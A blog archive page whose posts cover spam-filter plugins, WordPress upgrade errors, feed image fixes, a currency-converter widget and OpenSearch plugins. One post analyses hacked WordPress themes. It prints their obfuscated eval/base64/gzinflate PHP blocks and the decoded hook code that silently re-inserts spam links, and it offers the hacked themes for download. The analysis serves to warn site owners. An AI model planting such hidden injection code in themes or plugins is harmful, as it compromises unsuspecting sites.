Chaos Laboratory

Right since the beginning of my blogging career, I’ve been using Akismet in conjuction with Bad Behavior to weed out spam from my blog. Akismet is as a natural choice since it comes parcelled with WordPress installations. As for Bad Behavior, I decided to use it after reading plenty of articles on effective spam filtering.

Akismet has worked just fine for me so far. It has it’s occasional false positives (marking legit. comments as spam) – but I’m all right with it, since I don’t get much of spam everyday (at the most a 100). While Akismet may be very good at catching spam, there’s one quarter it needs to be revamped big time. The list of spams in Akismet is presented in a paginated manner while displaying the full body of each spam, making the list unnecessarily large and extremely tedious to go through. As I mentioned earlier – I don’t receive much of spam everyday. So, it’s relatively easy for me to wade through the list and pick-out any false positives. However, imagine what a pain it must be for the larger blogs receiving thousands of spam comments everyday. There are big chances of a good amount of legitimate comments going down the drain along with the spam flood. To make the situation worse, lately there have been a lot of complaints about Akismet producing more and more false positives.

After going through a bunch of reviews – both positive and negative, I decided to go ahead and give Defensio a try. For those who didn’t know, Defensio is a community-based anti-spam service similar to Akismet – but with certain added enhancements. They offer anti-spam solutions for a wide range of blogging platforms. It’s free for personal use while for commercial usage a nominal charge is levied on a per month basis.

Defensio sorts your quarantined comments by their “spaminess” value. This means that finding the occasional legitimate comment buried in your spambox (aka false positive) becomes dead easy: with Defensio you simply need to monitor the top portion of your quarantine to be confident that there’s no ham amongst your spam.

After I installed this plug-in, the first few spams that were caught were arranged into two distinct groups – Somewhat Spammy and Moderately Spammy. I’m yet to see the Super Spams… but I get the general idea.

A really nice feature of Defensio is that only the first line of the spam comment is shown (along with a link to display the full content). This makes for much better readability and sifting through the list. If you recall, I was grumbling about the lack of this in Akismet towards the beginning of this post. Score 1 for Defensio.

Before I forget, I’d like to mention one more contrasting point. When I had first installed Akismet and got my API key from WordPress.com, it gave me an insane amount of trouble to validate the key. This has been the same for any new blog I’ve helped install. For some reason, the validation wouldn’t go through for at least an hour following the registration at WordPress.com. However, with Defensio it was just click-and-go. Score 2.

Another distinct advantage of Defensio is that apart from the community anti-spam fighting feature, it operates on a blog-to-blog level.

This means that no two bloggers will see Defensio react in precisely the same way, even for similar comments, which is a good thing – because one person’s ham might be another person’s spam. And our continuously evolving set of algorithmic tricks ensures that we’ll never let spammers gain the upper hand.

Also available are RSS feeds of your comments and spam – which makes the monitoring less painful by curtailing the need to login into the Admin Panel on a regular basis. The Defensio site keeps track of your spam statistics and presents nicely decked-up charts that summarizes the evolution of spam and performance on your blog – a cool eye-candy feature to while your time away and “satisfy your inner bean-counter“.

Keep in mind, this is NOT an Akismet bashing post. I really respect the work of Matt and his team. They are the pioneers in this and without them – more than 80% of the WordPress based blogs wouldn’t see through a single day of Spam Attack. However, Defensio does offer a wider range of tools and features and that makes it a more viable option.

Now all I got to see is how well it handles my spam. On the initial try, it did get two false negatives – i.e. spam comments which passed through as legitimate ones. But since this is its teething phase, I’m going to overlook that and give it a chance to evolve according to my comment preferences. Will report back in a couple of weeks time (or two) on how well it’s performing.

Jun 20th by miCRoSCoPiC^eaRthLinG

Continue Reading

While I was away on my sabbatical (read coping with the all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast with the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I got asking and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? Managed to give me a fright at the first sight too. Whereas, I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mambo-jambo-ish as it looks. It contains 2 distinct php statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';

This statement alone didn’t make much sense though. It was the second statement, with it’s share of nested functions, that started shedding light on the whole issue…

eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96)));

If you’re familiar with php even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and helps executing it using the eval() statement. Prior to that, the code has been base64 encoded (the same encoding that is applied to email attachments) and then gzipped – if you follow the order of decoding.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));
?>

Save this code in a new php file and execute it from your local php-enabled web-server installation (in my case XAMPP) and here’s what you get…

  
  

Designed By Hawaii
    Vacation Rentals - Powered By WordPress - Theme Provided By WordPress Themes
    - Vacation Rentals

    Entries (RSS) | Comments
    (RSS).

< ?php echo get_num_queries(); ?> queries. < ?php timer_stop(1); ?> seconds.

< ?php wp_footer(); ?>

Pretty much, the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now, was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file, functions.php. Didn’t have to look far. A search for the terms eval andbase64 got me to the desired point. Once again I faced a block of code that went like…

< ?php }
$Q0d299dceb2cb08cb71bfbc1414b1505a='hZBBawIxEIXPm18xDAUTsN
pzZb3ISg9tBbvFY4gmajCbhCTbUMT/3m6qpx68DTPfvPdmiJCSi13SzlJUUi
fuXUw4Rm2jComno+oUN9qekM3IvrcFhX9TyuBMqoNxW2HgIXu5nZFK72k
pH+cHlfiXCBQ/mtdm0cJi9fne0mGRa8lguV69wRUdmhE2L826gQL0wdSjY0r
+eTrNOU+yC9IHFWPsvTdaxcnOdSNkdf3ESFVlz6/pSi4RgvimWJSs6BRCPQ
fc3DSgHU6IOAa8mf0R9wwR2O9DLuQH';
eval(gzinflate(base64_decode($Q0d299dceb2cb08cb71bfbc1414b1505a)));
?>

Taking the same road as the first time fetched me this very interesting block of code..

add_action("edit_post","insert_theme_link");
function insert_theme_link() {
    global $wpdb;
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));
}

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

• The first parameter dictates which WordPress action to hook or watch out for.
• The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link !

The nexus

Hot on the track, I decided to follow the link that was being injected here.. i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and I am not tarnishing their reputation anyhow by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as the functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

• http://www.amazingwordpressthemes.com/
• http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legit. WordPress theme sites. But be wary of any themes that you download and use from these sites for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing WHOIS on these domains, but that’s where I met-up with a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group or it’s the work of a lone individual.

The Philippino blogger Yuga, outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.

Downloads

Emerald Waters (Hacked)  (227.0 KiB, 275 downloads)

Elegance (Hacked)  (501.7 KiB, 266 downloads)

Graytone (Hacked)  (81.9 KiB, 276 downloads)

If you manage to dig-up any other hacked theme sites like these, make sure you leave a comment enlisting them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…

May 26th by miCRoSCoPiC^eaRthLinG

Continue Reading

Finally… decided to shake off that writer’s block and squeeze some time out of the demands of fatherhood and get back to serious blogging.

Oh Yes ! For those who didn’t know, I was blessed with this beautiful little bundle on the 10th of February, 2008. Life has never been and never will be the same The bundle is a “he” – i.e. a son and has been nick-named Adi (which roughly translates to Ancient or The Very First. He’s an absolute delight to be with, though more than a handful, when he realises he’s home alone with me. More on that later…

Other than that Google decided to strip me off my pagerank, which stood last at 5 as I was involved in paid-blogging – a policy that sent up such an uproar all over the blogosphere. Seems like Google decided to take it all out on the smaller sites (mine dropped to ZERO) while just marginally denting the bigger ones. Zero is where it stood for several months – till a couple of weeks back I saw it jumping up to 2. My site’s crawling back into the PR space I guess. Luckily, it didn’t affect my traffic anyhow and although I had stopped blogging altogether, the older content was enough to keep up a steady flow.

In the professional front, my work-load has trippled. Learnt many new tricks (I had long wanted to) – such as developing a complete WordPress theme right from scratch. I picked a template out from the free ones provided by TemplateWorld and got going. The result after 1 week of messing around with the WordPress Codex can be seen here. I’m kinda proud of it and I must say, not bad at all for a weeks work starting from level zero.

Updated a few of my WordPress plug-ins too, namely curreX and LiveSig – making them way cooler and better. Also shifted the plug-in base to the SVN hosted by WordPress.

More later… in the upcoming posts. I’m teeming with ideas and the next few weeks will see plenty of them pouring forth.

Cheers!

May 25th by miCRoSCoPiC^eaRthLinG

Continue Reading

Just today I performed an upgrade to the brand new WordPress 2.3.

Problem #1

The upgrade went without a hitch but the moment I refreshed my site I got this long error message that went like…


WordPress database error: [Table 'wordpress.wp_post2cat' doesn't exist]
SELECT p2c.category_id AS cat_id, COUNT(p2c.rel_id) AS numposts, UNIX_TIMESTAMP(max(p.post_date_gmt)) + '0' AS last_post_date, UNIX_TIMESTAMP(max(p.post_date_gmt)) AS last_post_date_gmt FROM wp_post2cat p2c INNER JOIN wp_posts p ON p2c.post_id=p.id WHERE (p.post_status='publish' OR p.post_status='static') AND p.post_date_gmt<='2007-09-27 11:44:24' GROUP BY p2c.category_id ORDER BY numposts DESC...


The same error kept appearing on the top of every single page. Now be aware that this new version of WordPress has a radically different table organisation. In all probability that was the cause of this error.

My first task was to disable every single plug-in I had installed. I was hoping that the error would go away immediately. It did not. After a bit of investigation I figured that even though the WP-Cache plug-in was disabled, it kept delivering the cached pages nevertheless. Deactivating it from the Plugins Panel didn’t help much. What I had to do was to go to Options > WP-Cache and disable it there. Only then did the caching stop.

The next step involved reactivating the plug-ins one-by-one and refreshing the site every time to see which plug-in was causing the error. I know it’s a painstaking task – but there’s no easy way out. Of course, you can make some well-aimed guesses, as the most likely culprit(s) are the plug-in(s) dealing with post categories, keywords, tags etc. Likewise, it didn’t take me long to catch the darned plug-in red-handed. Turned out to be Jerome’s Keywords (v2.0 beta 3). I use the Jerome’s Keywords Related Posts plug-in to display reading suggestions after each post. This plug-in in turn is dependent on Jerome’s Keywords.

As of now, I don’t think there’s any solution to this – except for deactivating the plug-in. I’ve posted a comment at the author’s site and waiting for some sort of a response.

Problem #2

As soon as I tackled the first one, a new one crept up silently and threw me off-balance again. This time the error message appeared when I tried to create a new post and save it. The screen went totally blank except for a lonely error message…

WordPress database error: [Table 'wordpress.wp_categories' doesn't exist]
SELECT c.cat_ID AS ID, MAX(p.post_modified) AS last_mod FROM `wp_categories` c, `wp_post2cat` pc, `wp_posts` p WHERE pc.category_id = c.cat_ID AND p.ID = pc.post_id AND p.post_status = 'publish' AND p.post_type='post' GROUP BY c.cat_id...

This one wasn’t hard to diagnose as half of my plug-ins were already deactivated. I simply started rolling back the activations one-by-one and had the trouble-maker in a minute or two. This time it was Google XML Sitemaps Generator (v3.0b8). Visiting the authors site took me to a post at the support forum at WordPress.org. Seems like this version of the plug-in has some sort of a conflict with Popularity Contest. The solution is quite simple here. Simply download the new v3.0b10 of this plug-in and update it. The error message disappears right-away.

So here are two very common problems you’re going to face while upgrading to WordPress v2.3. This post is intended to help those who’re facing the same problem and groping in the dark as I was a couple of hours back.

All the best.

Sep 27th by miCRoSCoPiC^eaRthLinG

Continue Reading

FeedBurner Email Subscriptions are a great way to spread your blog’s content far & wide – by sending your post feeds directly to the inbox of your subscribers. It’s a particularly viable option for the subscribers who don’t want to get into the hassle of firing up their feed reader every day. Quite a few of my regular subscribers utilise this method.

I’ve always kept a tab on each my feeds using a standard feed reader (FeedReader) and since they appeared fine to me I never really bothered to check on the email based feeds. Recently, I received a bunch of complaints from the email subscribers regarding “broken images” in the emails. Doing a quick check confirmed the reports – the images embedded in the posts were indeed missing. Instead they are replaced by the standard “broken image” icon. It took me a while to figure out the real problem – since the same feed(s) turned up just fine in any given feed reader.

The Problem

The root of the problem lies in how one embeds images and/or links in the posts – i.e. in the absolute or relative URL formats. To save up on typing, I’ve always resorted to relative URLs when specifying the source of the images in my posts. This actually is a good practise since this enables you to transfer your site to another domain without any ensuing hiccups over broken links and images. However, this doesn’t always translate properly in case of RSS/Atom feeds. The best thing to do in such cases is to use absolute URLs – so that the images in the feeds get displayed properly when they are viewed independently of the site or even when incorporated in someone else’s site.

As for me, I don’t follow the standardised WordPress approach of uploading all the images under the /wp-content/uploads/ directory. I have my own folder called /postimage/ where I manually upload the pictures and then link them in the relative format. For example, /postimage/image_file.jpg.

When my site is viewed directly in a browser or through a feed reader, the images are automatically located in relation to the site root, i.e. http://chaos-laboratory.com and thus displayed properly. For emailed feeds, the image source attributes get converted to http://postimage/image_file.jpg – which naturally doesn’t make any sense to your browser.

The Solution

Your best bet out here, is to device some mechanism where you can still use the relative URLs in your posts – but they automatically get translated to the absolute form (inclusion of your domain name before the folder and file information) in case of feeds.

The first method involves some messy editing of the WordPress feed publishing files (found in the /wp-includes/ folder). In any standard WordPress installation, they’re the PHP files starting with the word feed (feed-atom.php, feed-rss2.php etc). You can edit these files and implement Regular Expression matching routines to replace any relative links with the absolute form. This is more of a pro-coder approach.

The second method is to use a readily available WordPress plug-in named URL Absolutifier which works in a similar way – but translates all your relative URLs to their absolute forms for both your site and feeds. This is the approach I’ve taken up for the time being. Currently I am testing out this plug-in and will report my findings shortly. If it manages to fix my problem, I’ll try and implement the code directly into the feed publishing engine (mentioned in the first method).

Any thoughts on this ?

Sep 17th by miCRoSCoPiC^eaRthLinG

Continue Reading

A brief intro…

Past few weeks I’ve been extremely busy designing a Property Investment site for a client. The primary requirement was a custom CMS (Content Management System) – which I had to build from scratch. While it drove me over the edge at times overall it was a thoroughly enjoyable as well as an educational journey for me. Since this is a site that caters to foreign investors, one of the requirements was a Currency Conversion Calculator which could be embedded in any of the articles thus providing the visitors an opportunity to get an idea of the property prices in their native currencies, without having to leave the page. At first I sought the easy way out – i.e. I searched far & wide for a currency calculator service that’d allow me to convert between almost any of the world currencies. Unfortunately the free ones out there are really pathetic and the my client wasn’t willing to shell out any $$ for a paid service. That got me down to designing one on my own. I’ve been dabbling in AJAX for a while now and find the whole idea of RIA (Rich Internet Application) really attractive. So I decided to walk the AJAX way and came up with this cool-tool. Once done with the main project, I was so satisfied with the result that I thought it’d be a really good idea to convert it into a sidebar widget for WordPress. So here I am, with curreX – the Ajax based Currency Converter for WordPress.

Current Version

• 0.9

Features

• The widget is very simple and does exactly what it’s supposed to do. It accepts a currency value (integer or decimal) and a source & destination currency and gives you the converted rate once you hit the Convert button.
• It employs an AJAX back-end, i.e. the conversions are performed without having to refresh the whole page, making the tool really lightweight & fast. Looks cool too.
• Performs client-side validation of the amount entered – thus cutting out chances of entering an erroneous value and crashing the calc. midway while performing a conversion.

Requirements

• WordPress 2.x
• WordPress Sidebar Widgets Plugin in case you’re using WordPress 2.1.x or below. This is not required, if you’ve WordPress 2.2.x installed.

Download

curreX  (99.5 KiB, 5,951 downloads)

Installation

Installation couldn’t get any easier. Once downloaded, simply…

1. Unzip the archive.
2. Copy the extracted folder named curreX into your WordPress plug-ins folder.
3. Activate the plug-in from the Plug-in Manager in WordPress.
4. Visit the Sidebar Widgets page under Presentation menu to drag & drop the widget onto any sidebar you desire.

That’s it…

For those who’re using curreX with non-widget-enabled themes, you should insert the function
< ? show_currex( default_from, default_to, decimal_places, type, title ); ?>
in an appropriate place. For further details on this function & it’s parameters, refer to the FAQs section of the readme.txt bundled in the distribution.

Demonstration

A live demonstration of this can be found under the Coding section of my blog. Though the implementation of the demo is slightly different (it’s hard-coded into in a page), it should give you an idea on what the widget can do.

Showcase (the widget in action)

• GoBackpacking
• Hua-Hin Live – A customised version of the plug-in can be seen in action in the property list pages, once you’ve searched for properties

Subversion Repository

• curreX: SVN Check-out Link (Anonymous check-outs permitted)

Change Log

• Version 0.9 (2008-06-22)
  • Added Flash based Widget support. Now one has the option of choosing between the HTML/JavaScript version or the Flash version from the widget configuration panel of WordPress.
  • The structure of the show_currex() function (for non widget-enabled themes) has changed slightly too – to support embedding of the flash widget.
• Version 0.8 (2008-06-19)
  • While releasing version 0.7 I had made some changes in the path structure (reference to any additional files that were loaded in the background) – and I messed up a bit there. As a result, the core javascript module that fetched the conversion rates and performed the calculations wasn’t loading properly.
  • Fixed some minor CSS issues. Now the look & feel of the widget can be modified in its entirety through the accompanying CSS file.
• Version 0.7 (2008-05-16)
  • Added the functionality to display curreX in non-widget-enabled themes too (by popular demand). Till version 0.6, this plug-in could only be used in the form of a widget with widget-enabled themes.
• Version 0.6 (2008-05-11)
  • This is a complete port to jQuery. Decided to finalise on one ajax library and jQuery emerged the winner. No more Protoculous for me.
  • Split out the styling into a separate CSS file. Anyone with even a bit of CSS knowledge, can now easily alter the looks of the widget without having to touch the core code file(s).
  • Implemented BlockUI – a jQuery plugin that blocks the widget interface while performing a currency conversion routine (ajax based).
  • Included a HELP option, that leads directly to the Chaos-Lab Forums (curreX Subforum)
• Version 0.5 (2007-09-21)
  • Minor fix – but at the same time a major one from the perspective of functionality. The back-end URL for fetching conversion data from Yahoo! Finance had changed from finance.yahoo.com to download.finance.yahoo.com. This caused the plug-in to generate a message saying “Error contacting Yahoo! Finance” and not work at all. Thanks to Lia Johnston for pointing me to the correct URL.
• Version 0.4 (2007-03-15)
  • Fixed a minor bug that caused incorrect version reporting in WordPress plug-ins management panel.
• Version 0.3 (2007-03-15)
  • Bundled prototype.js library along with the distribution instead of relying on a theme to have it. This way the latest version of prototype can always be bundled along with.
  • Made some minor changes in the layout for smoother functionality & improvement of looks.
  • Renamed a bunch of plug-in related variables to avoid name collision with other plug-ins.
• Version 0.2 (2007-03-05)
  • Fine tuned the widget. Now the currency unit values are written off an array instead of the ungainly manual approach that was being used earlier on. This reduced the file-size of the main plug-in considerably despite adding new code.
  • Added the configuration section. One can now set the default currency units to be displayed when the widget loads (from & to).
  • Added a Decimal Place option, which defines the number of decimal places to show in the converted result.

Please Note

I offer support for my plug-ins via the Chaos Laboratory Support Forum only. I will NOT respond to support queries left in the comment section below and, in most cases, will also not publish them. Of course, if you’d like to say something nice or helpful, then feel free to leave a comment!

If you find this plug-in useful, please consider making a donation towards further development of this useful little utility.

Alternatively, you can help me by reviewing this post by clicking on the following link. Believe it or not, this will help us both earn some cash from PayPerPost.

Mar 01st by miCRoSCoPiC^eaRthLinG

Continue Reading

Here’s a short but sweet one. If you’re daunted by the task of creating OpenSearch plug-ins for your site or any of your favourite sites, fear no more. OpenSearchFox is a cool new Firefox extension that can create such plug-ins for you with a single click.

Is it really that simple?

Absolutely so. All you need to do is install the extension and then browse to the site you want to create the search plug-in for. Once you’re at the site, locate the Search Box and right-click on it. You’ll notice a new item named “Add OpenSearch plugin” in your menu. The item is accompanied by a blue magnifying glass icon to help you easily spot it. Just click on that and you’re done.

Only intermediary step involves a single dialog box which asks you to name the plugin whatever you feel like. The plug-in is created and added to your search engine list directly along with the fav-icon for the site. If the site lacks a fav-icon, you can always use one of your own through the same dialog box where you name the plugin.

Give it a try and see for yourself…

Those who still want to learn the inner workings of OpenSearch plug-ins and create one programmatically, here are a couple of resources for you:

• Creating OpenSearch plugins for Firefox
• Tutorial: Creating OpenSearch Plugins for Firefox (adds to the QuickSearch bar)
• Firefox OpenSearch Plug-in Samples for a wide variety of sites
  

Feb 11th by miCRoSCoPiC^eaRthLinG

Continue Reading

Following the tutorial(s) I posted on creating OpenSearch plug-ins for Firefox that can search Invision Power Board based forums & WordPress blogs, I received quite a few requests for help in creating such plug-ins for a wide variety of blogs/CMS/sites.

To make the job easier for all of you, I decided to create a couple of sample plug-ins, which I’ll list here as zip files. The zip will contain…

• An XML file – which contains the actual plug-in code
• A sample HTML file, which shows how to display a plug-in installation link on your site, as well as how to enable auto-discovery of the same by Firefox & IE7

Simply go through those files and replace the appropriate fields. In most cases, all you’ll need to modify is the actual URL to your site and the Author details. While setting up the plug-in at your site, feel free to put your name as the author’s name in it. No credits are required

I’ll try to cover as much ground as possible and update this list frequently. At the moment, the list isn’t so “wide” as I claimed in the title and if you don’t find a suitable plug-in here, check back at a later point of time, or just drop me a line at:

To start with, I’ll list the plug-ins I’ve received the maximum number of requests for…

Plug-ins List

Content Management Systems

1. Mambo CMS based Sites
   
2. Joomla CMS based Sites

Bulletin Board Systems

1. Invision Power Board based Forums

Blog Softwares

1. WordPress based Blogs

Miscellaneous Sites

1. iPodNova Torrent Search
2. BlogSpot based Blogs
3. PsyDB – Psychedelic Trance Database

Jan 14th by miCRoSCoPiC^eaRthLinG

Continue Reading